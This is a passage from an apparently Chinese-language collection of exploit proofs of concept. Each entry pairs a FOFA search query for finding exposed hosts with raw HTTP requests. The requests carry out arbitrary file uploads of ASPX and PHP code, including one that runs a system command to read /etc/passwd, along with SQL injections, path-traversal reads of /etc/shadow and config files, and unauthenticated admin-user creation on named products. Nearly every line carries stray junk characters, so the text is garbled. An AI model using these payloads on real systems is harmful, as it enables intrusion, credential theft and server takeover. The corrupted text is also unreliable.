Content-Type: text/xml( k! p" b7 i. d/ s% j$ ^' h
Accept-Encoding: gzip7 b# W; b! r4 P$ T- L2 ~1 J
- P% E0 A7 M* |+ g" I8 v<?xml version="1.0" encoding="utf-8"?>
' J5 F0 [+ k( B5 x- g2 m" @# a<soap:Envelope xmlns:xsi="
# b- U5 q* L8 Thttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"/ B) y" d. B0 X1 T9 ~& K( D
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
0 e( V2 n# p8 [( T9 A<soap:Body>
2 o# i& p0 U# x6 z<UploadResume xmlns="http://tempuri.org/">; y) Z" _1 F/ \ `4 @
<ip>1</ip>
; L! b/ c2 s( c5 x5 h X& T<fileName>../../../../dizxdell.aspx</fileName>0 B) @8 X U* Q" O& W+ g4 ?9 D
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
5 K1 _- q* ^& H<tag>3</tag>- |! E4 {; p- e! f4 T1 v
</UploadResume>
6 M- }) h& s b* p u</soap:Body>9 K$ T' X3 {0 {3 j! C1 E9 `
</soap:Envelope>8 d; l) q( `! M9 b/ E9 ?
+ C2 w2 @8 J' k/ @ q
* k9 C, {* ?9 W. n3 \/ ]6 Mhttp://x.x.x.x/dizxdell.aspx
. a8 M& |/ Q& y! m+ Q- ?/ w/ |
+ |) d; B0 r7 p* [7 i( f, `# r162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
" k% ~: t6 D0 L/ i' c3 TFOFA: app="和丰山海-数字标牌"
+ d% T& Y! j* S W: h" y6 u: L5 sPOST /QH.aspx HTTP/1.1
, ~! b2 [6 n6 }- ~* w) VHost: x.x.x.x
8 W% P2 A" W) F9 q7 W+ y3 Y H3 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
. j5 Y: {4 C, M4 j2 n9 I8 I5 I; ] ?Connection: close
2 a. J: f2 A/ Z' f% ?9 kContent-Length: 583: U- i$ M* P2 `$ S( i! ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
. j; I3 S4 B, T/ bAccept-Encoding: gzip r$ x$ {) E$ [$ h: H: g, p
" ] \/ D( K0 L2 X) q------WebKitFormBoundaryeegvclmyurlotuey
" Z+ e, y) X) v6 Q% hContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx", I; q" L3 z8 l' _3 W h
Content-Type: application/octet-stream7 B( S# e1 c6 f) k: k
" R0 g# I/ }# j$ ?: B
<% response.write("ujidwqfuuqjalgkvrpqy") %>
# g0 D: r6 C7 y( W7 s# M------WebKitFormBoundaryeegvclmyurlotuey
4 H6 }: A- e5 x$ |* yContent-Disposition: form-data; name="action") {, \0 y* @' Z: b
6 _! V3 y" P5 P. \/ J
upload: ?4 V; g6 F3 N* m$ ~
------WebKitFormBoundaryeegvclmyurlotuey
% h+ u6 Z! e9 R$ dContent-Disposition: form-data; name="responderId"
+ m. o6 ^ n* }3 I/ S0 \
% ~* @7 j2 W9 i; X$ n+ ~ResourceNewResponder M, M) n G) N
------WebKitFormBoundaryeegvclmyurlotuey
" L8 N! ~& d2 D/ ~Content-Disposition: form-data; name="remotePath"
1 K3 w2 @' w) R9 X8 p6 f! p7 c. N- N5 ~7 a/ @. s# g' s' C
/opt/resources' h0 e7 l6 r; ?/ n
------WebKitFormBoundaryeegvclmyurlotuey--
4 z7 B; x# j6 G k# n* q6 K7 H
/ V; u" E1 w: W5 @6 J! w7 o7 C' y2 A6 K
http://x.x.x.x/opt/resources/kjuhitjgk.aspx* S# g" X3 J) e/ ] r
2 [$ n3 i3 E/ T$ D6 \6 l+ o163. 号卡极团分销管理系统 ue_serve.php 任意文件上传: d- t5 q' x- g4 O3 k" \; o
FOFA: icon_hash="-795291075"2 G! ?$ a# b$ ^( P
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.11 A4 Z, p& J5 o3 ~6 e7 ?# _4 Q
Host: x.x.x.x! h6 r# i. ~3 ?7 F8 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.368 g8 l5 z8 B# f) B4 b
Connection: close
: t- u' Q" i5 RContent-Length: 293
8 L$ A6 a2 w3 p& P# _ XAccept: */*
# f) k3 {1 @4 A- k: |Accept-Encoding: gzip, deflate
9 t S0 o, B# s$ @$ K! G! q/ l1 VAccept-Language: zh-CN,zh;q=0.9
6 ~' L9 w; v- A; ^. j# c6 \Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod3 o9 V" M1 u6 d+ @5 L E- s( f/ v: s
4 d$ v1 c' V( t/ `7 n------iiqvnofupvhdyrcoqyuujyetjvqgocod' j* m0 E# F/ ]/ ]1 U
Content-Disposition: form-data; name="name"; c% z' v5 O8 Z8 Q
' X1 l9 H1 ~4 G7 X
1.php
% A% @2 N/ t: i" W* ]( ?/ w------iiqvnofupvhdyrcoqyuujyetjvqgocod# ` d, B( u' G7 \6 z1 a$ {
Content-Disposition: form-data; name="upfile"; filename="1.php"4 z, i4 }$ B" D; x( @9 u/ Z) h
Content-Type: image/jpeg; {5 J! R/ j2 t
) c: ?) f9 g# o+ w! Crvjhvbhwwuooyiioxega
% f9 k8 p) a J: {3 m7 Q------iiqvnofupvhdyrcoqyuujyetjvqgocod--
: w6 W$ I0 c1 B8 z4 K: t- r: I5 u+ I% c% F7 h* O7 i* X: J. f5 z" B
" v! i: q/ g, m% k/ ~+ A164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传5 h2 g. A: e$ Q1 p
FOFA: title="智慧综合管理平台登入"7 u% i ]4 T9 [/ v
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
* x; Z5 m' t1 L( bHost: x.x.x.x
8 j: f" ]9 W8 M8 W5 b! LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.04 {, Z7 \ }" m( D" R$ o
Content-Length: 288' d0 I! Q$ H5 p& @" N6 s; W
Accept: application/json, text/javascript, */*; q=0.01& p' d1 h/ `$ @) W* W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
( V: G' a! a# M' v( p0 RConnection: close. N0 Q' F& T p, y- a$ w
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl# r. [5 L" [" O" J# X9 q4 V/ f
X-Requested-With: XMLHttpRequest+ e- @7 K% |& ~6 [3 k" a( B; i
Accept-Encoding: gzip
* L2 |' O. a: x7 N1 W i/ t, i2 ~" a% M b) _
------dqdaieopnozbkapjacdbdthlvtlyl
- Z( E$ s# \$ }2 o& l5 JContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"3 `1 m- t. _5 w9 R& {/ z
Content-Type: image/jpeg
0 X! r5 z6 o! b/ Z
) Z. R. }4 V6 `0 |! `4 N<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>0 e7 X; |8 H: E5 T0 |/ c- A( r. V7 Y
------dqdaieopnozbkapjacdbdthlvtlyl--( {- {. r2 X- ~6 d
' N) ?" [& u9 G W# O
2 j7 ?) D2 L8 o" G; \; dhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx# u# r- \3 A$ t* U9 f
1 j' i( O' \8 c# I" ]6 b( `! j5 `
165. OrangeHRM 3.3.3 SQL 注入
1 o) b! j/ d, J0 ?7 nCVE-2024-36428
l& ?. \' Z. r7 p9 w, \6 eFOFA: app="OrangeHRM-产品"
( M2 `/ h. c* }8 w) bURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END)) u2 S: \: |. S* b E
0 U0 {5 Y1 n2 O* j1 Z8 R6 Y/ J/ X; x. ?: X7 g: g
166. 中成科信票务管理平台SeatMapHandler SQL注入0 e2 a q$ H3 `
FOFA:body="技术支持:北京中成科信科技发展有限公司"
- w1 J; ~/ N9 e3 s6 XPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1; H# f4 W, W3 \; `
Host:
# S" h. T, B. e# B0 e& h5 @# mPragma: no-cache' ]0 O" d$ I' Y* c) Y5 F+ B
Cache-Control: no-cache J4 J5 D0 _- ~
Upgrade-Insecure-Requests: 1: p/ }- m# V B. g( e$ |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.365 o1 S5 Z( X. f+ m8 b. ?1 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- x0 s& {/ F) x0 g
Accept-Encoding: gzip, deflate( U+ T! x1 `% _- I5 ]
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
. V, p1 A- H; Y* wCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE2 E( ^/ O+ x( `4 y) N: L1 y# r
Connection: close
* P7 ^" q: p* v+ m/ G2 \9 mContent-Type: application/x-www-form-urlencoded+ G1 i* x& I* m7 v
Content-Length: 895 t; i& j i7 Q9 G
3 K ?" H; V% x9 g
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
0 w) c/ Z: l! ], h% r$ W$ F( B4 w4 e0 d! x
' C" w7 S- E4 ~# ]' p" z167. 精益价值管理系统 DownLoad.aspx任意文件读取
$ m. k# P5 q4 f( eFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
6 w- O" a" ?! }# B; U6 H8 @3 @GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
E0 }7 P" ]' cHost:
7 s& c. x, c3 Z( R* QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 @% M; |( G, T5 v( O
Content-Type: application/x-www-form-urlencoded4 a: S' [9 N" u" Z$ o) ^* t
Accept-Encoding: gzip, deflate
; x. T# T' w, h3 X- pAccept: */*: k# H8 ^ z( H' S9 j! _, I3 }
Connection: keep-alive5 m" D: ]" d# u+ I. s e7 q8 B
" M+ b- c2 P' e! [! w0 ^- z2 ^) d9 D+ o5 K% z, Q
168. 宏景EHR OutputCode 任意文件读取
/ f6 j) j! t4 U2 BFOFA:app="HJSOFT-HCM"; r3 N* ]/ y: y, }
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
: a, V8 P O, G1 z4 C# ~Host: your-ip5 f1 ^" U& F" n- f; R0 F( }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36# I% c$ \' T* g/ ~3 x
Content-Type: application/x-www-form-urlencoded2 S1 _& E6 u& X6 @7 L
Connection: close
3 j* N% w: r) t+ F& a7 D7 Q( W b& J# }" [1 I
. X3 t, t5 ]: ]9 ?( @ r" F, z. M1 R3 Q9 q% O
169. 宏景EHR downlawbase SQL注入# T5 P0 D. ~9 }, f- y# v
FOFA:app="HJSOFT-HCM") s, f4 C4 |1 F! E
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
4 X ]0 Y3 D8 H$ s$ JHost: your-ip+ B, k) V8 q; a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- X' l$ Z: U) g- m5 W1 tAccept: */*8 U! Y$ K+ d: p6 H
Accept-Encoding: gzip, deflate4 W3 {. r) d3 z7 B1 C9 @
Connection: close5 [4 E4 c; B" n2 g' T
( F& o+ M8 Z2 t$ @6 f2 Z
" r l2 y/ Q7 I( H" f0 O
; O# C5 }) i8 p" m" X {9 n170. 宏景EHR DisplayExcelCustomReport 任意文件读取! v0 Q& o& g/ [& |8 b: Q
FOFA:body="/general/sys/hjaxmanage.js"; e5 L* }& ^4 d/ x: C0 c7 S
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.15 p) Y3 h! W) q4 a9 d& U
Host: balalanengliang' \+ \5 r0 `6 L+ T# s7 B; T9 ]
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 o; v1 }6 ]2 A6 n
Content-Type: application/x-www-form-urlencoded% d5 Q8 `( p, ~
/ |: d. Q' ~ H* Q( K' S& r
filename=../webapps/ROOT/WEB-INF/web.xml
* `* e: i% y& x0 L: k3 @% Z" M/ d; ?$ {2 B% d3 B/ l
6 h8 M( q! H4 z& {2 |0 \( E171. 通天星CMSV6车载定位监控平台 SQL注入; e# C7 I9 B9 [2 m
FOFA:body="/808gps/"
A* Y* k H# w2 x+ oGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1. `+ X8 g: A$ Q8 U. F* w, Q
Host: your-ip* B* B6 E5 z& t# r! D! x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.07 h% [3 }8 t: O4 F
Accept: */*
& @& U: q/ o: }2 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 {, W6 T5 @ d$ sAccept-Encoding: gzip, deflate8 g8 i; V8 M/ J a5 `) K
Connection: close
1 @/ K. z% M1 ?+ n6 C' u- O! I$ M5 ^# {- }, F
) V0 r9 i" B) [
: t6 N4 [) g! K2 |172. DT-高清车牌识别摄像机任意文件读取
% O8 O7 ^3 _4 h3 BFOFA:app="DT-高清车牌识别摄像机"% A8 W: J+ g6 q2 q5 g& ?
GET /../../../../etc/passwd HTTP/1.16 S5 `) ^& g7 v, U V
Host: your-ip
" }9 f9 J1 I# H% ~: Q" _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# K6 X1 ]5 C9 C R0 s; GAccept-Encoding: gzip, deflate, C" F/ y/ r! x* a7 r( k
Accept: */*& ?6 w& D$ K+ e5 t" z
Connection: keep-alive# d: p* M4 W! x+ I8 W
1 i! Z7 [: Y% `4 `
( K1 g2 \$ t: z% N8 y
6 z& Z n) V+ j173. Check Point 安全网关任意文件读取
6 Z; N$ x* w8 oCVE-2024-24919
: `; m: a, E: k& f# v- UFOFA:app="Check_Point-SSL-Network-Extender"
5 a; `$ m) z5 f& g- z% s3 u. R# PPOST /clients/MyCRL HTTP/1.1
" [. g! b1 }! n: o# ?Host: your-ip
" ` `% x+ a) bContent-Type: application/x-www-form-urlencoded
: d8 w( K# L" w! M
4 g0 u* E; h+ v1 ?* s$ r8 caCSHELL/../../../../../../../etc/shadow
3 X4 |% Y P, V6 h" ~5 k) s n8 B1 t3 U; Y+ P: M, I7 Q
- ~+ T H% W+ s+ a/ i5 d5 T% t( w. y$ K( j
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
7 n- w! R+ c xFOFA:app="金和网络-金和OA"
# Y2 d% K8 o6 `3 n9 Q8 iGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
0 T' J* R" L) }4 X( OHost: your-ip
# N, X. t% I W8 i: L1 Q; k, nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& n! I. N) j* ~6 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% z8 L3 _. F* z* ?( UAccept-Encoding: gzip, deflate, br8 u0 i( s; |/ ^2 M: {! ^* `
Accept-Language: zh-CN,zh;q=0.9
$ D9 O( b: k; w* o' m. m, ]* WConnection: close
& H/ p. j7 x* c" y2 f
; U% M" | I) A: J$ S; C$ E+ |) I) G8 Y
I3 P6 L& R8 O' ?5 Y
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
& n: ], ~6 O' L* l) j- Q$ nFOFA:app="金和网络-金和OA"
0 `$ o8 i( [* TGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1* p1 u3 m+ [* ^( R
Host:5 |1 ~4 w; {* e T- y
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 v) O! b* l. E L5 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& p% Z4 o0 {- p3 ?$ H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 E' D9 g8 M2 p3 _ E% A5 t
Accept-Encoding: gzip, deflate
* _$ ^$ d# R" @2 `Connection: close! d9 N2 `! Q; E% k. `& U
Upgrade-Insecure-Requests: 1+ g! i7 W1 U. _
7 W3 h4 P: E, e! C0 P }# b# r+ E6 T
) Y- z3 Q) G# k: C1 `
176. 电信网关配置管理系统 rewrite.php 文件上传
2 A& S/ t0 x( _' ^ P. K# z% aFOFA:body="img/login_bg3.png" && body="系统登录"% v$ u( s% B$ D3 b
POST /manager/teletext/material/rewrite.php HTTP/1.1
" t0 i% B: ~* sHost: your-ip
% I: E# s1 h2 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.08 G" F9 @# K) v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
! h2 d# b+ ]0 Q# p/ q; W+ v% EConnection: close
2 ]4 `! R5 m: H
6 `) t. g: a/ L/ e7 i3 C; j" _8 `- T------WebKitFormBoundaryOKldnDPT
* u) ^* j) m% \# WContent-Disposition: form-data; name="tmp_name"; filename="test.php"
9 @" m! q) q: R3 n9 V) FContent-Type: image/png
8 m7 t2 V9 V k' U8 V 5 ~. [% ?6 ~1 T9 `& a2 ]
<?php system("cat /etc/passwd");unlink(__FILE__);?>, d# f% W* S4 }3 P b6 H
------WebKitFormBoundaryOKldnDPT
* }: Y" e9 [. u1 H. YContent-Disposition: form-data; name="uploadtime"
3 f t( y9 v3 A$ l 3 h1 y; b, u' ^
) t% P6 s6 \1 ?# d* q! ^% ]& l8 l------WebKitFormBoundaryOKldnDPT--
: w& |# n" |; J8 F3 j! j5 _; R. w* H6 N( F" X) R
7 u) s$ L, j" E( O8 e
i' f# \ i1 g m1 x5 k3 {177. H3C路由器敏感信息泄露
: l- Z+ X. N) K" M, T, |7 z3 d/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg& p0 {; Z1 \3 U2 D
/userLogin.asp/../actionpolicy_status/../M60.cfg( ]$ o- s# @6 L
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
" J9 {- H8 N: O& r* B% q- c/userLogin.asp/../actionpolicy_status/../GR5200.cfg0 U+ [9 u( W0 l9 H0 A% I4 ?
/userLogin.asp/../actionpolicy_status/../GR3200.cfg" H7 E6 Z: D$ F1 d0 @9 K
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
% F \/ y6 S* U5 h/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg' M* o4 m0 X }7 w9 T# R4 d
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg; [* {1 P) Z9 Y
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg# H) `- _" R9 `
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
! e8 G% k" p. T/userLogin.asp/../actionpolicy_status/../ER5200.cfg- q2 V6 n; R3 v3 d
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
( l6 I" ?& {& |1 T7 F2 Y& D7 `/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg0 R, o. f' p/ v& b
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
* h9 S& ? c$ B) v7 q6 O; |* ^/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg! g( V) A( M# }! ?" N1 L! |. X1 e% q1 Q
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
% N" ?4 c0 s, R1 ^/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg3 x2 ]1 M# W/ z
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg" [4 Y8 n5 f8 L) R0 l
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg% ~1 _" B& P4 H" X2 }" Y
/userLogin.asp/../actionpolicy_status/../ER3100.cfg- y% Q6 G/ b. G, D% e6 B8 x2 i
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
* p; X+ s$ e6 I/ P. P: d7 h3 A
R' r; x) S5 T# r6 [: D$ ~2 M0 H- q( K5 V5 N8 U9 Z/ o% W
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
, r, r+ ]; B O4 ^/ N, O; mFOFA:header="/selfservice"
* [! T/ A5 x [! p" [' L' m. QPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1$ q% H3 U, R M- B
Host:: \, V2 z. U2 X, \2 \6 ?" p% _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 @: P& O! ^& ~4 e( ^- p2 Z
Content-Length: 252
+ A% g% `. v7 K8 jAccept-Encoding: gzip, deflate
% A/ j( ]2 w; e, Q- gConnection: close
8 m0 M- d' _/ j, C% C1 |! mContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
' B$ W D- f8 Z3 [-----------------aqutkea7vvanpqy3rh2l
1 ^0 r& ]$ S# u. c; [" nContent-Disposition: form-data; name="12234.txt"; filename="12234"- B. |7 d* ~: `! F! W: ^
Content-Type: application/octet-stream5 z/ g; u& |: f5 \0 R, X9 j
Content-Length: 255
6 T0 t n' \" L
4 v9 O M3 A+ [* i+ S12234( b3 R9 c) W' Z+ L6 w: @ b
-----------------aqutkea7vvanpqy3rh2l--) Z" t$ d* i- q' |( j( ^0 @4 O
$ H/ L. F" \5 P/ k; S# t, v/ R2 {6 B" m) \ l/ _$ z! e
GET /imc/primepush/%2e%2e/flex/12234.txt$ ~1 N5 _6 r3 _4 t2 A2 B
3 A3 ? s7 N% \5 X/ D) h! a! H/ m; \; p
: P7 q3 `' ~4 o/ S
179. 建文工程管理系统存在任意文件读取) p0 p9 G! f" \! i7 v5 N
POST /Common/DownLoad2.aspx HTTP/1.1
+ E$ Z" W2 D1 L% W; R+ o7 k7 t; B/ XHost: {{Hostname}}9 U) e9 B' y, ~$ z" s7 z7 e
Content-Type: application/x-www-form-urlencoded0 q8 x4 [" i6 i5 @/ y( e4 i
User-Agent: Mozilla/5.0# o2 {4 Q: u/ D+ m8 a
; I8 G: e* G0 A n0 ?$ F/ {
path=../log4net.config&Name=- |4 r: B0 J3 c8 k) @( Y
5 Q2 a9 z+ s. n( r# D4 R# X6 T4 W- f
180. 帮管客 CRM jiliyu SQL注入
- X. Q8 o @: A% ~5 N4 sFOFA:app="帮管客-CRM"
" s# ` `* Y/ UGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
* E) G# U: ]" { {! p A, H; MHost: your-ip
& W7 s# r" ?% r! V8 P! \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* _" s/ f! m( ? V3 a# JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 ^% T* c+ W' y6 LAccept-Encoding: gzip, deflate
H4 o: N; G7 Y2 |5 SAccept-Language: zh-CN,zh;q=0.99 y7 K3 _/ `- b+ @. k7 H: _ W9 `/ J
Connection: close
& @4 _( V; j# L$ d6 l
# \( C+ p9 P2 {* R$ i" g9 V( j9 Z
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
, d% R' t1 }( V, j" _ SFOFA:"PDCA/js/_publicCom.js"5 H0 S M" ]+ l# f, X7 H
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1 ^7 T) o% _' u9 n8 ]$ K/ f
Host: your-ip
, n) O; `, S9 F6 H$ oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
2 e" C. {4 r" ^1 {) p: s: ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# l5 v: k* S1 v/ m6 I
Accept-Encoding: gzip, deflate, br
; @( _ }. G V+ rAccept-Language: zh-CN,zh;q=0.99 L5 O. P) ]9 k# _# B% I
Connection: close
+ Z% a! P3 m! s$ F8 w3 t; EContent-Type: application/x-www-form-urlencoded$ b, A8 o, ]1 Q1 ~0 Q; |
% t( B- d8 \7 ]% ?1 x
0 a5 }" {* T+ f6 R" E. }; xaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
0 M* C' t. q/ e' q6 V; A
A, G; z# [ x; I: _
9 e5 d# w0 ~# F1 U; f182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建8 Y' ~( f2 v5 D' {
FOFA:"PDCA/js/_publicCom.js"- {. f6 D; A" e; p' N
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1& n3 W; x4 b+ |: G& T3 A
Host: your-ip* Q. n1 G q1 D1 j. P! m; J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36) J% V' g) O, B: F1 K! q5 x$ h$ Y0 ^, c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 W9 ~9 S( C# C; P: m. {2 b+ k
Accept-Encoding: gzip, deflate, br
' a2 n8 B: u7 E5 i( yAccept-Language: zh-CN,zh;q=0.9
4 p% b1 L5 ]' F3 A8 H/ }- c8 { vConnection: close/ ^1 K# D! k/ e9 q
Content-Type: application/x-www-form-urlencoded
6 J/ O/ h4 d; F3 T) B" ^$ T) ]" m: b. W* F$ o8 O
6 f6 M$ c- ^( L, P: }. I) Fusername=test1234&pwd=test1234&savedays=1+ ~9 ~+ q! P+ O+ y& o
9 s0 c. r" p3 m5 U0 O$ I1 Q% \$ l- s6 @ o t) C: `4 t
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入; B" O$ l; l/ d1 f3 H+ J2 n
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
. e8 K3 z1 {+ d% i* Z9 J! z$ HGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1# v: q! t5 {9 P, ~- ^- b- h, x
Host: your-ip. L0 `* X& d, T- p: J) E/ b$ O
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.367 v8 m. o+ t0 O$ v m) `
Accept-Charset: utf-8
4 d% M8 |: A! E' A3 T. C0 ~Accept-Encoding: gzip, deflate
( \$ I" C5 P5 Y0 Q' D, SConnection: close( x9 T- q$ y% e4 K$ b+ P+ U8 t
' S, ?$ ] K9 g' q
2 [) r7 J( S j) N184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加% a4 }' d0 O Z! ^1 I
FOFA:server="SunFull-Webs"
z& [- z) v+ _. pPOST /soap/AddUser HTTP/1.1+ l4 U5 b9 N8 \' F
Host: your-ip
8 X; ?8 P3 v$ l+ zAccept-Encoding: gzip, deflate8 s7 s' V/ f, |6 i2 N( d( V X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
' I+ J( l$ \5 q N( jAccept: application/xml, text/xml, */*; q=0.016 g, c/ Z6 a& X7 F1 a: E
Content-Type: text/xml; charset=utf-8& q7 H9 ?9 ?0 ~: z6 P; D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ E& T) S6 \8 d) D( x, A0 ]( J7 P& jX-Requested-With: XMLHttpRequest) _" L- y6 i9 I. a
2 _' k8 @6 Q, B* r
& U/ ^7 T# Q) x
